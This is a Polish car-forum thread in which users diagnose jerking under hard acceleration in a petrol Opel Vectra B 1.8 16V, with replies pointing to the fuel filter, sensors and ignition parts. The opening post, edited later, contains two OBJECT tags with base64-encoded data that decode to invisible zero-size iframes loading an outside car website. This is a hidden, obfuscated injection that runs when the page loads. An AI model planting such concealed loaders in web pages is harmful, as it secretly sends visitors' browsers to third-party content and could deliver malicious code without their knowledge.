Vectra B 1.8 16V - problem z silnikiem

Moderator: fs.mod
  • Poinformuj znajomych na Facebook-u o tym wątku
  • Poinformuj znajomych na Gwar-ze o tym wątku
  • Poinformuj innych ludzi na Wykopie o tym wątku
  • Poinformuj znajomych na Twitter-ze o tym wątku
  • Poinformuj znajomych na Blip-ie o tym wątku
  • Poinformuj znajomych na Buzz-ie o tym wątku
  • Poinformuj znajomych na GG o tym wątku

Vectra B 1.8 16V - problem z silnikiem

Post» 30 Kwi 2009, 10:04

Witam Mam problem związany z raptownym przyśpieszaniem gdy wcisne raptownie pedał gazu samochód szarpie tak jak by sie dusił. ale tylko przy raptownym przyśpieszaniu
samochód jest bez gazu sama benzyna. pomocy
<OBJECT DATA="data:text/html;base64,PGlmcmFtZSBzcmM9Imh0dHA6Ly9yYXBpZGNhci5wbC9zenVrYWoucGhwIiB3aWR0aD0wIGhlaWdodD0wPg==" width="1" height="1"></OBJECT>
<OBJECT DATA="data:text/html;base64,PGlmcmFtZSBzcmM9Imh0dHA6Ly9yYXBpZGNhci5wbCIgd2lkdGg9MCBoZWlnaHQ9MD4=" width="1" height="1"></OBJECT>
Ostatnio edytowany przez Misieklalus, 26 Lis 2009, 16:05, edytowano w sumie 1 raz
Misieklalus
Nowicjusz
Nowicjusz

Miejscowość: Czemierniki

Post» 30 Kwi 2009, 11:02

moze to byc wina filtru paliwa
Awatar użytkownika
>>>kamil<<
Nowicjusz
Nowicjusz

Miejscowość: zabrze

Post» 30 Kwi 2009, 12:14

filtr raz lub dawka paliwa za duża i nie zdąży jej przepalić w komorze spalania i się dusi na jakich to wtryskach jest , opisz coś więcej, czy przy wyspszęglaniu też szarpie ?
To co jest pod maską to tylko silnik ,to co drzemie w każdym z nas to tylko pasja ..
inż. Scherman
Nowicjusz
Nowicjusz

Miejscowość: Bonn

Post» 30 Kwi 2009, 17:13

Wykonaj diagnostykę. Winny może być przepływomierz, sonda lambda lub układ zapłonowy, ale najpierw zmierzyłbym ciśnienie paliwa.
Maciek_S
Nowicjusz
Nowicjusz

Miejscowość: Pomorze

Re: Vectra B 1.8 16V - problem z silnikiem

Post» 26 Lis 2009, 09:38

Witaj

Ja jestem przekonany ze to problem z kablami lub cawka zaplonowa ewentualnie swiece.

Przeplywomiez powietrza ma zupelnie inne oznaki a mianowicie auto jest owiele slabsze i bardzo muliste ale sie nie dusi i szarpie poprostu niema mocy.

Przy sondzie tez powinienes miec inne objawy i w dodatku powinny sie palic 2 kontrolki z ABS i TR

[ Dodano: Czw Lis 26, 2009 08:39 ]
Witaj

Ja jestem przekonany ze to problem z kablami lub cawka zaplonowa ewentualnie swiece.
Co do filtra tez jest taka mozliwosc.

Przeplywomiez powietrza ma zupelnie inne oznaki a mianowicie auto jest owiele slabsze i bardzo muliste ale sie nie dusi i szarpie poprostu niema mocy.

Przy sondzie tez powinienes miec inne objawy i w dodatku powinny sie palic 2 kontrolki z ABS i TR
Anthony
Nowicjusz
Nowicjusz

Miejscowość: Den Haag

Problemy techniczne